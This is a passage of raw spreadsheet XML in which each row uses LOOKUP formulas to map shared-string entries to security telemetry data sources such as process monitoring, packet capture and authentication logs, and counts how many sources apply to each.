        <v>5</v>
      </c>
      <c r="F101" s="53"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="16" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="53" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C102" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D102" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F102" s="53"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="16" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="53" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C103" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D103" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E103" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F103" s="53"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="16" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="53" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C104" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D104" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E104" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F104" s="53"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="16" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="53" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C105" s="17" t="s">
        <v>204</v>
      </c>
      <c r="D105" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E105" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F105" s="53"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="16" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="53" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C106" s="17" t="s">
        <v>206</v>
      </c>
      <c r="D106" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E106" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F106" s="53"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="53" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C107" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D107" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E107" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F107" s="53"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="16" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="53" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C108" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D108" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E108" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F108" s="53"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="16" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="53" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>211</v>
      </c>
      <c r="D109" s="53">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E109" s="53">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F109" s="53"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="16" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="53" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D110" s="53">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E110" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F110" s="53"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="16" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="53" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
      <c r="C111" s="17">
        <v>100</v>
      </c>
      <c r="D111" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E111" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="53"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="16" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="53" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C112" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D112" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E112" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F112" s="53"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="16" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="53" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C113" s="17" t="s">
        <v>217</v>
      </c>
      <c r="D113" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E113" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F113" s="53"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="53" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D114" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="53"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="16" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="53" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C115" s="17" t="s">
        <v>221</v>
      </c>
      <c r="D115" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E115" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F115" s="53"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="16" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="53" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C116" s="17">
        <v>100</v>
      </c>
      <c r="D116" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="53"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="53" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="53"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="16" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="53" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C118" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D118" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E118" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F118" s="53"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="16" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="53" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C119" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D119" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E119" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F119" s="53"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="53" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C120" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D120" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F120" s="53"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="16" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="53" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E121" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="53"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="16" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="53" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C122" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D122" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E122" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F122" s="53"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="53" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C123" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D123" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E123" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F123" s="53"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="16" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="53" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C124" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D124" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E124" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F124" s="53"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="16" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="53" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C125" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D125" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E125" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F125" s="53"/>
      <c r="G125" s="19"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="16" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="53" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C126" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D126" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E126" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F126" s="53"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="53" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C127" s="17" t="s">
        <v>235</v>
      </c>
      <c r="D127" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E127" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F127" s="53"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="16" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="53" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E128" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="53"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="53" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C129" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D129" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E129" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="53"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="16" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="53" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>239</v>
      </c>
      <c r="D130" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E130" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F130" s="53"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="53" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C131" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D131" s="53">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E131" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F131" s="53"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="16" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="53" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C132" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D132" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E132" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F132" s="53"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="16" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="53" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C133" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D133" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F133" s="53"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="53" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C134" s="17">
        <v>100</v>
      </c>
      <c r="D134" s="53">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="53"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="16" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="53" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C135" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D135" s="53">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E135" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F135" s="53"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="16" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="53" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C136" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D136" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F136" s="53"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="53" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C137" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D137" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E137" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F137" s="53"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="16" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="53" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C138" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D138" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E138" s="53">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F138" s="53"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="16" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="53" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D139" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E139" s="53">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F139" s="53"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="53" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C140" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D140" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E140" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F140" s="53"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="16" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="53" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D141" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="53"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="53" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C142" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D142" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E142" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F142" s="53"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="16" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="53" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D143" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E143" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F143" s="53"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="16" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="53" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C144" s="17">
        <v>100</v>
      </c>
      <c r="D144" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E144" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="53"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="16" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="53" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C145" s="17">
        <v>0</v>
      </c>
      <c r="D145" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E145" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F145" s="53"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="16" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="53" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C146" s="17">
        <v>100</v>
      </c>
      <c r="D146" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E146" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="53"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="16" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="53" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D147" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E147" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="53"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="16" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="53" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C148" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D148" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E148" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F148" s="53"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="16" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="53" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D149" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E149" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F149" s="53"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="53" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D150" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="53"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="16" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="53" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>107</v>
      </c>
